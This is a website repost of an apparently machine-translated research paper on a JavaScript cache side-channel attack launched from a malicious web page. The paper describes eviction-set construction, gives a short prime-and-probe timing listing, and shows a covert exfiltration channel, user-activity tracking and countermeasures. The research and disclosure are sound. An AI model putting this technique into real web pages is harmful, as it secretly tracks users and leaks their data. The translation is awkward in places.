Example Analysis of JavaScript Cache area attack 07/01 Update SLTechnology News&Howtos

Example Analysis of JavaScript Cache area attack

2025-07-01 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >

Shulou(Shulou.com)06/01 Report--

This article shows you the feasible JavaScript cache attack, the content is concise and easy to understand, can definitely brighten your eyes, through the detailed introduction of this article, I hope you can get something.

# # Summary

We will show the first side channel attack against micro-architecture that runs entirely in the browser. Unlike other research results in this field, this method does not require the attacker to install any applications on the victim's computer to launch the attack, the victim only needs to open a malicious web page controlled by the attacker. This attack model is scalable and easy to operate, and is close to today's network environment, especially because most desktop browsers are connected to Internet and are almost undefensible. Based on the LLC attack proposed by Yarom et al. [23], this attack allows attackers to remotely obtain information belonging to other processes, users and even virtual machines, as long as they are running on the same physical host as the victim's browser. We will explain the rationale behind this attack, then use a high-bandwidth hidden channel to verify its effect, and finally use it to create a mouse and network activity recorder that covers the entire system. It is possible to resist such attacks, but the countermeasures required are somewhat impractical at the cost of the normal use of browsers and computers.

# # 1 introduction

Side channel analysis is a very powerful cryptanalysis attack. Attackers obtain secret information by analyzing the physical signals (power, radiation, heat, etc.) generated by security operations within the security device [15]. It is said that intelligence services used it in World War II, and Kocher et al first discussed this issue in an academic context in 1996 [14]. Side channel analysis has been shown to be used to hack into numerous real-world systems, from car alarms to highly secure cryptographic coprocessors [8] [18]. Cache attack (Cache Attack) is a side channel attack related to personal computers, which leads to the disclosure of information because cache buffers are used by different processes and users.

Although there is no doubt about the ability of side channel attack, it is relatively limited to be applied to the system. One of the main factors affecting the feasibility of side channel attacks is the assumption of uncertain attack models: except for network-based timing attacks, most side channel attacks require the attacker to be very close to the victim. Caching attacks generally assume that an attacker can execute arbitrary binary code on the victim's machine. While this assumption applies to IaaS or PaaS environments such as the Amazon cloud computing platform, it is not so appropriate for other environments.

In this report, we challenge this restrictive security assumption with a less constrained and more feasible attacker model. In our attack model, the victim only needs to visit a web page owned by the attacker. We will show that even in such a simple attacker model, the attacker can still extract meaningful information from the attacked system within a feasible period of time. In order to be consistent with such computational settings, we focus on tracking user behavior rather than getting the key. The mode of attack in the report is therefore highly feasible: the assumptions and limitations for the attacker are practical; the running time is real; and the benefits to the attacker are practical. As far as we know, this is the first side channel attack that can be easily extended to millions of targets.

We assume that the personal computer used by the victim in the attack is equipped with a newer model of Intel CPU, and further assume that the user uses a browser that supports HTML5 to access the web. This covers the vast majority of PCs connected to Internet, as shown in Section 5.1. Users are forced to visit a page with an element controlled by an attacker, such as an advertisement. The attack code itself performs a JavaScript-based cache attack, as shown in Section 2, which continuously accesses the LLC of the system under attack. Because all CPU kernels, users, processes, protection rings, etc., share the same cache, it can provide attackers with details of the attacked user and system.

# 1.1 Modern Intel CPU memory architecture Modern computer systems usually use a high-speed central processing unit (CPU) and a large but slow random access device (RAM). To bridge the performance gap between the two modules, modern computer systems use caching-a smaller but faster memory structure that holds a subset of RAM that has recently been accessed by CPU. Caches are usually designed in a * * layered * * design, in which memory structures are layered between CPU and RAM with columns getting larger and slower. Figure 1, taken from paper [22], shows the cache structure of Intel Ivy Bridge, including a smaller level 1 (L1) cache, a larger * * level 2 (L2) cache * *, and the largest level 3 (L3) cache at the bottom and connected to the RAM. Intel the new generation of CPU currently codenamed Haswell uses another embedded DRAM (eDRAM) design, so it is beyond the scope of this article. If the data to be accessed by CPU is not currently in the cache, a miss will be triggered, and an item in the current cache must be * * eliminated * * to make room for the new element.

Figure 1:Intel Ivy Bridge

Intel's cache micro-architecture is * * nested * *-all data in the first-tier cache must be stored in both the second-and third-tier caches. Conversely, if an element is eliminated in the third-tier cache, it is also immediately removed from the secondary and primary cache. It is important to note that the design of the AMD cache microarchitecture is not nested, so the method described in this article cannot be applied to the platform immediately.

This article focuses on the third-level cache, often referred to as LLC. Because of the large LLC, it will be inefficient for CPU to search the contents of the entire LLC when accessing memory. To avoid this problem, LLC is usually divided into different groups, each of which corresponds to a fixed subset of the memory space. Each group contains several cache lines. For example, the Core i7-3720QM processor in the Intel Haswell family has 8192 = 2 ^ 13 groups, each with 12 cache lines of 64 = 2 ^ 6 bytes, which together make up a cache of 8192 x 12 x 64 = 6 MB. If CPU wants to check whether a given physical address is in the third-level cache, it will first calculate the group, and then only check the cache lines within the group. As a result, a cache miss of a physical address will result in the elimination of one of the few cache lines in the same group, a fact that will be used repeatedly by our attacks. The mapping method from 64-bit physical address to 13-bit group index has been developed by Hund et al through reverse engineering in 2013 [12]. Of the 64 bits representing the physical address, 5 to 0 are ignored, 16 to 6 are directly used as the lower 11 bits of the group index, and 63 to 17 hash to get the higher 2 bits of the group index. LLC is shared by all kernels, threads, processes, users, and even virtual machines running on the same CPU chip, regardless of privilege rings or other similar protection measures.

Modern personal computers use a virtual memory mechanism in which user processes generally cannot directly access or access the physical memory of the system. Instead, the process is assigned different virtual memory pages. If a virtual memory page is accessed by the currently executing process, the operating system dynamically allocates a page frame in physical memory. CPU's memory management unit (MMU) is responsible for mapping access to virtual memory addresses by different processes to physical memory. The page and frame size of the Intel processor is generally 4KB, and the page and page frame are aligned by page-the start address of each page is a multiple of the page size. This means that the lower 12 bits of any virtual address corresponds to the corresponding virtual address one by one, and this fact is also used in our attacks.

# 1.2 caching attacks are a typical example of attacks against microarchitectures. In his excellent survey, Aciamez defined such attacks as the use of "underlying processor structures below the boundaries of trust architectures" to obtain secret information from different security systems. Cache attacks are based on the fact that although there are many security mechanisms such as sandboxes, virtual memory, privilege rings and hosts at the upper level, secure and insecure processes can affect each other through the sharing of cache areas. After constructing a "spy" process, attackers can measure and interfere with the internal state of other security processes through shared caches. Hu first discovered in 1992 [11], and some subsequent research results have shown that side channel attacks can be used to obtain AES keys [17] [4], RSA keys [19], and even allow a virtual machine to invade other machines on the host.

Our attack is based on the fill + probe model, which was first described by Osvik in [17] but targeted at first-level caching. Then extended by Yarom et al in [23] to LLC with a larger memory page system enabled. We extend this approach to support the more common 4K page size. In general, there are four steps to populate + probe. As a first step, the attacker creates one or more * * removal sets * *. A delete set is a series of addresses in memory that, when accessed, occupy a cache line used by the victim process. In the second step, the attacker populates the entire group by accessing the removal set. This forces the victim's code or instructions to be eliminated from the group and puts the group into a known state. In the third step, the attacker triggers or simply waits for the victim to execute and possibly use the group. Finally, the attacker detects the group by accessing the removal set again. If the access latency is low, it means that the attacker's instructions or data are still in the cache. Otherwise, a high access latency means that the victim's code uses groups, so the attacker can understand the victim's internal state. The actual time measurement is made using the unprivileged assembly instruction RDTSC, which can get the very accurate number of cycles of the processor. There is a second purpose of traversing the linked list again, which is to force the group to enter a state controlled by the attacker and prepare for the next round of measurements.

# 1.3 Web runtime environment JavaScript is a scripting language with dynamic types and object-based runtime evaluation, which supports the clients of modern Internet. The JavaScript code is transmitted to the browser in the form of source code, and the browser just-in-time compilation (JIT) mechanism is used to compile and optimize it. Due to the fierce competition among different browser manufacturers, the continuous improvement of JavaScript performance has attracted much attention. As a result, in some scenarios, the efficiency of JavaScript execution is already comparable to that of machine languages.

The core functions of the JavaScript language are defined by the ECMA Industry Association in the ECMA-262 standard. The language standard is complemented by a series of API defined by the World wide Web Consortium (W3C), so it is suitable for developing Web content. The collection of JavaScript API is constantly evolving, and browser vendors continue to add new API support according to their own development plans. Two specific API are used in our work: the first is definition 9 of the type array, which provides efficient access to unstructured binary arrays. The second is the high-precision time API16, which allows the application to measure time below milliseconds. As shown in Section 5.1, most of today's mainstream browsers support both API.

JavaScript code runs in a highly sandboxed environment-code delivered in JavaScript has limited access to the system. For example, JavaScript code cannot open and read files without the user's permission. JavaScript code cannot execute machine language or load a local code base. Most notably, JavaScript code doesn't have the concept of pointers, so you can't even know the virtual address of a JavaScript variable.

# 1.4 our goal is to construct a LLC attack that can be deployed through Web. This process is challenging because JavaScript code cannot load shared libraries or execute native language programs, and is forced to call scripting language functions to measure time because it cannot directly call special assembly instructions. Despite these challenges, we have successfully extended caching attacks to Web-based environments:

We show a special method for creating atypical removal sets on LLC. Unlike [23], our method does not require the system to be configured to support larger memory pages, so it can be quickly applied to a wide range of desktop and server systems. We show that although this method is implemented using JavaScript, it can still be done in the actual time period.

We showed a full-featured way to launch LLC attacks with unprivileged JavaScript. We evaluate its performance by hiding the channel, including between the same machine, between different processes, and between the virtual machine and its host. JavaScript-based channels are similar to those implemented in machine language in [23] and can reach speeds of hundreds of kb per second.

We show how to use a cache-based approach to effectively track user behavior. This application of cache attack is more relevant to our attack model, which is different from the application of cryptanalysis in other results.

Finally, we analyze the possible countermeasures against the attack and the cost of the whole system.

Document structure: the second chapter, the design and implementation of attack methods in different stages. In the third chapter, the hidden channel based on the attack method is also used to verify the performance of the method. Chapter 4, how cache attacks are used to track users' behavior inside and outside the browser. The fifth chapter, summary, puts forward countermeasures and unsolved research challenges.

# # 2 attack method

As mentioned earlier, a successful populate + probe attack consists of several steps: establishing a removal set for one or more related groups, populating the cache, triggering the victim's action, and finally detecting the group again. Although populating and probing is easy to implement, it is not so easy to find a group corresponding to a system operation and establish a removal set for it. In this chapter, we describe how these steps are implemented with JavaScript.

# 2.1 create a removal set # 2.1.1 Design as written in [23], the first step in populating the + probe attack method is to create a removal set for a group shared with the attacked process. This removal set contains a series of variables, all of which are mapped to the same group by CPU. According to the recommendation of paper [20], using linked lists can avoid memory pre-reading and pipelined optimization of CPU. We first show how to create a removal set for any group, and then solve the problem of finding a group to share with the victim.

It is pointed out in paper [17] that the first-level cache determines the group allocation based on the low bits of the virtual address. Assuming that the attacker knows the virtual address of the variable, it is easy to establish a removal set in an attack model based on first-level cache. However, the group allocation of variables in LLC is based on the address of physical memory, and in general, non-privileged processes cannot know. In order to avoid this problem, the author of paper [23] assumes that the system uses a large page model, in which the lower 21 bits of the physical address and the virtual address are the same, and the high order of the group index is obtained by iterative algorithm.

In the attack model we consider, the system runs under the 4K page size model, and only the lowest 12 bits of the physical address and the virtual address are the same. The bigger problem, however, is that JavaScript doesn't have the concept of pointers, so even if it's a self-defined variable, the virtual address is unknown.

The mapping from 64-bit physical address to 13-bit group index has been studied by Hund et al. [12]. They found that accessing a contiguous 8MB-sized "obsolete buffer" in physical memory invalidated all groups in the tertiary cache. Although we have no way to allocate such an "obsolete buffer" in user mode (in fact, article [12] is implemented through kernel mode drivers), we use JavaScript to allocate an array of 8MB size in virtual memory (which is actually a collection of random, discontiguous 4K physical memory pages allocated by the system), and then measure the system-wide impact of traversing the buffer. We find that the access latency increases significantly if other irrelevant variables in memory are accessed immediately after iterating to this elimination buffer. Another finding is that this phenomenon persists even if you access it every 64 bytes instead of accessing the entire buffer. However, the mapping of the 131k offset values we accessed to 8192 possible groups was not immediately clear because we did not know the physical memory address of each page in the buffer.

An unreliable way to solve this problem is to give an arbitrary "victim" address in memory and violently find 12 addresses that share groups with that address from 131K offset values. To do this, we can select several of the 131K offsets as a subset, iterate through all the offsets, and then measure whether the access delay has changed. If the delay increases, it means that a subset of 12 addresses shares the same group as the victim address. If the delay does not change, none of the 12 addresses in the subset is in the group, so the victim address is still in the cache. By repeating this process 8192 times, each time with a different victim address, we can identify each group and build our own data structure.

Programs inspired by this will run for a very long time. Fortunately, the page frame size of Intel MMU (Section 1.1) is very helpful because the virtual address is page aligned, and the lower 12 bits of each virtual address are consistent with the lower 12 bits of each physical address. According to Hund et al., 6 of the 12 bits are used to uniquely determine the group index. Therefore, one offset in the elimination buffer shares 12 to 6 bits with the other 8K offsets, rather than all 131K. In addition, as long as you find one group, you can immediately know the location of the other 63 groups in the same page frame. In addition, when JavaScript allocates a large data cache, it is aligned with the boundary of the page frame, so you can use the greedy algorithm in algorithm 1.

Algorithm 1 Profiling a cache set Let S be the set of unmapped pages, and address x be an arbitrary page-aligned address in memory

1. Repeat k times: (a) Iteratively access all members of S (b) Measure T1, the time it takes to access x (c) Select a random page s from S and remove it (d) Iteratively access all members of S\ s (e) Measure T2, the time it takes to access x (f) If removing page s caused the memory access to speed up considerably (i.e., T1 − T2 > thres) Then this page is part of the same set as x. Place it back into S. (G) If removing page s did not cause memory access to speed up considerably, then this address is not part of the same set as x. 2. If | S | = 12, return S. Otherwise report failure.

By running algorithm 1 multiple times, we can gradually build a removal set and overwrite most of the cache, except for those used by the JavaScript runtime itself. We note that unlike the elimination buffer established by the algorithm in [23], our removal set is atypical-because JavaScript has no concept of pointers, if we find a removal set, we have no way to know which group it corresponds to the CPU cache. In addition, each time you run the algorithm on the same machine, you get a different mapping. This may be due to the use of the traditional 4K page size instead of the 2MB page size, which exists even if JavaScript is not used in machine language.

# 2.1.2 verify that we have implemented algorithm 1 in JavaScript and verified it on a machine with Ivy Bridge and Sandy Bridge,Haswell series CPU. The machine is equipped with Safari and Firefox running on Mac OS Yosemite and Ubuntu 14.04 LTS operating systems. The system is not configured to use large pages but to use the default 4K page size. Listing 1 shows the code that implements algorithm 1.d and algorithm 1.e, showing how to traverse the linked list and measure time under JavaScript. If the algorithm is to run under Chrome and Internet Explorer, it requires several additional steps, as shown in Section 5.1.

Listing 1

/ / Invalidate the cache set var currentEntry = startAddress; do {currentEntry = probeView.getUint32 (currentEntry);} while (currentEntry! = startAddress); / / Measure access time var startTime = window.performance.now (); currentEntry = primeView.getUint32 (variableToAccess); var endTime = window.performance.now ()

Figure 2 Cumulative performance of performance analysis algorithms

Figure 2 shows the results of the performance analysis running on Intel i7-3720QM CPU with Firefox 35.0.1 and Mac OS 10.10.2 installed. We are pleased to find that more than 25% of groups are mapped in 30 seconds and 50% in 1 minute. It is very easy for this algorithm to run in parallel because most of the execution time is spent on the maintenance of the data structure and only a small part is spent on invalidating the cache and measuring. The whole algorithm can be completed in less than 500 lines of JavaScript code.

Fig. 3 probability distribution of access delay of two methods on Haswell

In order to verify that our algorithm can distinguish different groups, we designed an experiment to compare the access delay of a variable before and after being flush. Figure 3 shows the probability distribution function of two ways to access variables. Gray represents the access time of variables that flush out of the cache in our way, while black is the access time of variables that reside in the cache. Time measurement uses JavaScript's high-precision timer, so it also includes JavaScript runtime latency. The difference between the two is obvious. Figure 4 shows the results captured on an earlier version of Sandy Bridge CPU, which has 16 entries per group.

By selecting groups of columns and constantly measuring their access latency, an attacker can get a very detailed picture of cache real-time activity. We call this visual presentation a "memory spectrum" because it looks a lot like the spectrum of sound.

Fig. 4 probability distribution of access delay of two methods on Sandy Bridge figure 5 memory spectrum example figure 5 shows the memory spectrum fetched every other 400ms. The X axis corresponds to the time and the Y axis corresponds to different groups. The time resolution in the example is 250 microseconds, and a total of 128 groups are detected. The density of each point represents the access delay of the group at this time. Black represents a low latency, which means that no other process has accessed this group since the last measurement. White means that the attacker's data has been eliminated since the last measurement.

If you take a closer look at this memory spectrum, you can get several obvious facts. First, although JavaScript timers are used instead of machine language instructions, the measured jitter is small, and it is easy to distinguish between active and inactive groups. There are several obvious vertical lines in the figure, which means that multiple adjacent groups are accessed at the same time interval. Because the addresses of physical memory corresponding to contiguous groups are also contiguous, we believe that this signal represents an assembly instruction of more than 64 bytes. Other groups gathered together were visited at the same time. We infer that this represents access to variables. Finally, the horizontal white line indicates that a variable is constantly being accessed. This variable may belong to the measurement code or to the current JavaScript runtime. It's amazing to get so much information from a web page without any privileges.

# 2.2 removing sets from areas that identify meaning in the cache allows attackers to monitor the activities of any group. Because the removal set we get is atypical, the attacker must find a way to associate the analyzed group with the victim's data or the address of the code. This learning / classification problem has been raised by Zhang and Yarom in articles [25] and [23], respectively, using different machine learning algorithms such as SVM to try to find rules in cache latency measurements.

In order to start the learning process effectively, the attacker needs to induce the victim to do something, and then check which groups are accessed by this operation, as detailed in algorithm 2.

Let Si be the data structure matched to eviction set i 1.For each set i: (a) Iteratively access all members of Si to prime the cache set (b) Measure the time it takes to iteratively access all members of Si (c) Perform an interesting operation (d) Measure once more the time it takes to iteratively access all members of Si (e) If performing the interesting operation caused the access time to slow down considerably, then the operation was associated with cache set i.

Because JavaScript is subject to a series of permission restrictions, implementing step (c) is challenging. By contrast, Apecechea and others can trigger a small kernel operation with an empty sysenter call. To achieve this step, we must investigate the JavaScript runtime to find out which functions trigger interesting behavior, such as file access, network access, memory allocation, and so on. We are also interested in functions that have a relatively short run time and do not produce legacy functions. Because the legacy may lead to garbage collection, which in turn affects the measurement of step (d). Ho et al have found several such functions in the article [10]. Another way is to induce the user to perform a specific action on behalf of the attacker (such as pressing a key on the keyboard). The learning process in this example may be structured (the attacker knows when the victim is about to execute) or unstructured (the attacker can only assume that the slow response of the system over a period of time is caused by the victim's actions). Both methods are used, as detailed in section 4.

Because our program will always detect the activities generated by the JavaScript runtime, such as the code for high-performance timers and other modules in the browser that are not related to the current call, we actually find the relevant groups by calling two similar functions and * * comparing * * the results of their two activity performance analyses.

# # 3 JavaScript implementation of hidden channel based on cache area

# 3.1 motivation as shown in article [23], LLC access mode can be used to establish a high-bandwidth hidden channel, effectively used to infiltrate sensitive information between two virtual machines on the same host. In our attack model, although the attacker is not in a virtual machine on the same host, but in a web page, the motivation to hide the channel is different, but it is also interesting.

By motive, we assume that some security service is following the trail of crime master Bob. The department installed a software called APT (Advanced Persistent Threat) on Bob's personal computer through a fishing program. APT is designed to record Bob's criminal record and send it to the department's secret server. However, Bob was very vigilant and used an operating system with mandatory flow tracking (Information Flow Tracking) [24] enabled. This feature of the operating system prevents APT from connecting to the network after accessing files that may contain the user's private data.

In this case, as long as Bob can be induced to visit a web page controlled by the security department, the department can immediately use JavaScript-based cache attacks. APT can use the side channel based on cache area to communicate with malicious websites, so that there is no need to transmit users' private data over the network, and the information flow tracking function of the operating system will not be triggered.

This case study is inspired by a "RF retro-reflector" design from a security department, in which a collector, such as a microphone, does not send the received signal directly, but modulates the received signal to the "radiation signal" sent to it by an external "collecting device".

# 3.1.1 there are two requirements for the design of hidden channels: first, keep the sender simple, and in particular, we do not want it to implement the removal set algorithm in Section 2.1. Second, because the removal set at the receiver is atypical, it should be simple enough so that the receiver can search for which group the sender's signal is modulated to.

To meet these requirements, our emitter / APT allocates a 4K array in its own memory and constantly converts the collected data into a memory access pattern for this array. The 4K array covers the cached 64 groups so that APT can transmit 64 bits of data in each time period. In order to ensure that memory access can be located by the receiver, the same access mode is repeatedly applied to several copies of the array. As a result, most of the cache is executed, in contrast to the method in article [23] that uses a typical removal set, so only two cache lines are activated.

The code at the receiving end does a performance analysis of the operating system's memory and then searches for the page frame that contains the data modulated by APT. The real data will be demodulated from the memory access mode and sent back to the server, the whole process will not violate the protection of the operating system for information flow tracking.

# 3.1.2 to evaluate our attack model, it is assumed that the sender is written in (relatively fast) machine language, while the receiver is written in JavaScript. Therefore, we assume that the limiting factor of the overall system performance is the sampling speed of malicious websites.

To evaluate the bandwidth of the hidden channel, we wrote a Mini Program that traverses the system's memory (that is, a bit map with the word "Usenix") in a predetermined mode. Next, we use JavaScript cache attacks to try to find this access pattern and measure the maximum frequency that JavaScript code can achieve.

Fig. 6 Hidden channel from host to host

The memory spectrum shown in figure 6 captures the execution of this hidden channel. The theoretical bandwidth of the hidden channel is about 320kbps by measurement, which is consistent with the bandwidth of the hidden channel 1.2Mbps across virtual machines implemented in machine language in article [23].

Figure 7 the memory spectrum in the hidden channel from host to virtual machine is similar, but not from the receiver code running on the same host, but on a virtual machine (Firefox 34 browser, Ubuntu 14.01 system, VMWare Fusion 7.1.0). Although the peak frequency in this scenario is only about 8kbps, it is surprising that a web page in a virtual machine can detect the underlying hardware.

# # 4 tracking user behavior using cache attacks

Most studies on cache attacks assume that the attacker and the victim are on the same machine in the data center of the cloud computing provider. Such machines are not generally configured to receive interactive input, so most research in this field focuses on how to obtain encryption keys or other confidential state information, such as the status of random number generators [26]. This paper will study how to use cache attacks to track user behavior, which is more related to our attack model. We note that article [20] has tried to track keystroke events by fine-grained measurement of system load using CPU's first-level cache.

This case will demonstrate how a malicious website can use cache attacks to track user activity. In the attacks shown next, we will assume that the user opens the page of a malicious website in a background tab or window, and performs some sensitive operations in another tab or another application that has no Internet connection at all.

We chose to focus on mouse operations and network activities, because the code that the operating system is responsible for dealing with them cannot be ignored. Therefore, we expect that these operations will leave larger footprints in the cache. And as described below, they can also be easily triggered by JavaScript's security model that is limited everywhere.

# 4.1 the structure of the two attacks is similar. First, performance analysis is performed, and the attacker probes each group with JavaScript. Then, in the training phase, the activity to be detected (network activity or mouse operation) is triggered, accompanied by high-precision sampling of the cache area. In the training phase, on the one hand, the measurement script directly triggers the network activity (executing a network request), on the other hand, it keeps shaking the mouse on the web page.

By comparing the free-time and busy-time activities of the cache during the training phase, the attacker can know which part of the group will be activated by the user action, and train a classifier about the group. Finally, during the classification phase, attackers constantly monitor these interesting groups to keep abreast of the user's activities.

We use a basic unstructured training process, that is, assuming that the most concentrated operation performed by the system during the training process is measured. In order to take advantage of this, we calculate the Hamming weight of each measurement over time (equal to the number of active groups in a certain period), and then use the k-meas algorithm to cluster the measured data. Then the average access delay of each group in each cluster is calculated, and the center of each cluster is calculated. When we encounter an unknown measurement vector, we calculate the Euclidean distance between the vector and each center and classify it into the nearest category.

In the classification phase, we use the command line tool wget to generate network traffic and move the mouse out of the window. In order to obtain the real data of network activity, we also use tcp-dump to measure the traffic of the system, and then associate the timestamp recorded by tcp-dump with the timestamp detected by the classifier. In order to get real data about mouse operations, we wrote a page to record all mouse events and their timestamps. It should be emphasized that the page that records mouse activity is not in the browser running the measurement code (Firefox), but in another browser (Chrome).

# 4.2 verify the network activity detected in figure 8, the mouse activity detected in figure 9

The results of activity measurements are shown in figures 8 and 9. The top of both images shows the real-time activity of a subset of the cache. At the bottom of the picture is the output of the classifier and the real data collected externally. As the picture shows, our extremely simple classifier is very effective in identifying mouse operations and network activities. There is no doubt that the use of more advanced training and classification techniques can further improve the effectiveness of attacks. It should be emphasized that mouse-operated detectors do not detect network activity, and vice versa.

The measurement frequency of the classifier is only 500Hz. As a result, it has no way to count individual packages, but only indicates whether it is active or inactive in a phase. On the other hand, code that detects mouse activity collects more events than code that records real data. This is because Chrome browsers limit the frequency of mouse events, which is about 60Hz.

Chen et al. proved in a famous article [5] that the monitoring of network activities can be used as the cornerstone of in-depth mining of user behavior. Although Chen et al assume that attackers can monitor all incoming and outgoing data from victims at the network layer, the techniques shown here essentially allow malicious websites to monitor network operations performed by users at the same time. Attacks can be enhanced by more metrics, such as memory allocation (see article [13]), DOM layout events, disk writes, etc.

# # 5 conclusion

This paper shows that the range of side channel attacks is much larger than expected. The attacks proposed in this paper can be aimed at most machines on the Internet and are not limited to some specific attack scenarios. The sudden vulnerability of so many systems to side channel attacks means that algorithms and systems to prevent side channel attacks should be widely used, not just in some specific cases.

# 5.1 the universality of vulnerable systems our attack requires a personal computer equipped with Intel CPU, using Sandy Bridge, Ivy Bridge, Haswell or Broadwell microarchitecture. According to IDC, 80 per cent of PCs sold since 2011 meet this requirement. Further, assume that the browser you are using supports the specification of HTML5 high-precision timers and type arrays. Table 1 lists the proportion of global Internet traffic to the earliest and vulnerable versions of these API supported by browser vendors, according to the StatCounter GlobalStatas report in January 2015. As shown in the table, 80% of browsers on the market are currently unable to resist such attacks.

Browser brandHigh Resolution Time SupportTyped Arrays SupportWorldwide prevalenceInternet Explorer101111.77%Safari861.86%Chrome20750%Firefox15417.67%Opera1512.11.2%Total--83.03%

The effectiveness of the attack depends on whether it can be accurately measured with JavaScript high-precision time API. Although the W3C defines the unit of high-precision time as "milliseconds and accurate to 1/1000" for this API specification, it does not give the highest resolution of this value, which varies from browser to browser and operating system to different operating systems. For example, during the test, we found that the Safari browser on MacOS is accurate to nanosecond, while the IE browser on Windows is only 0.8 microsecond. On the other hand, Chrome browsers gave a resolution of 1 microsecond on all the operating systems we tested.

So in figure 3, the difference between a single cache hit and a cache miss is about 50 nanoseconds, and the scripts for performance analysis and measurement need to be slightly modified on operating systems with finer time resolution. In the performance analysis phase, instead of counting the time of a single miss, we repeatedly read the memory to magnify the difference in time. In the measurement phase, we have no way to enlarge the time of each cache miss, but we can take advantage of the fact that code from the same page frame usually invalidates adjacent groups. As long as 20 of the 64 groups in the same page frame produce cache misses, our attacks can be carried out at even millisecond resolution.

The attack we proposed can also be easily applied to mobile devices such as mobile phones and tablets. It is worth mentioning that Android browsers have supported high-precision time API and type arrays since version 4.4, but iOS Safari (8.1) did not support high-precision time API at the time of this writing.

# 5.2 the attack described in this article is feasible because it gathers some decisions from the microarchitecture layer to the final JavaScript runtime design and implementation: how to map physical memory addresses to groups, nested cache architecture, JavaScript high-speed memory access and high-precision timers, and finally JavaScript permission model. Some mitigation measures can be taken at every point here, but it will have an impact on the normal use of the system.

At the micro-architecture level, modifying the mapping of physical memory to cache lines can effectively prevent our attacks, that is, we no longer use 6 of the bottom 12 bits of the address to directly select a group. Similarly, switching to a non-nested cache microarchitecture instead of a nested one makes it almost impossible for our code to eliminate an item in the first-level cache, making measurement more difficult. However, these two design decisions were chosen to make the design of CPU and the use of caching more efficient, and changing them will affect the performance of many other applications. Besides, modifying the CPU micro-architecture is not a trivial matter, because upgrading the deployed hardware is definitely not possible.

At the JavaScript level, it seems that lowering the resolution of the high-precision timer can make the attack more difficult to launch. However, high-precision timers are built to address the practical needs of JavaScript developers, ranging from music and games to augmented reality and telemedicine.

One possible stopgap is to restrict applications from accessing timers only with user permission (for example, by displaying a confirmation window) or through third-party approval (such as downloading from a trusted "app store").

An interesting way is to use heuristic performance analysis to detect and block such attacks. For example, Wang and others can use a large number of algorithms and bitwise instructions to predict the existence of this cryptographic application element [21], and can notice that there are certain patterns for various measurement steps to access memory in our attacks. Because the runtime of modern JavaScript, as part of the mechanism of performance analysis to guide optimization, has been able to examine the runtime performance of the code in detail. So the JavaScript runtime should be able to find code with performance analysis behavior during execution and change the results accordingly (for example, adding jitter to a high-precision timer, or dynamically adjusting the location of the array in memory, etc.).

# 5.3 conclusion in this paper, we show how to effectively launch side channel attacks against microarchitecture through suspicious web pages, which has been considered to be very effective. Unlike cache attacks, which are generally used in cryptanalysis applications, this paper introduces how it is used to effectively track user behavior. The range of side channel attacks has been expanded, which means that counter measures against side channel attacks must be taken into account when designing new security systems.

# # Thank you

We are grateful to Henry Wong for his research on Ivy Bridge cache elimination strategy and Burton Rosenberg for his explanation of pages and page frames.

The above is a feasible JavaScript cache attack. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.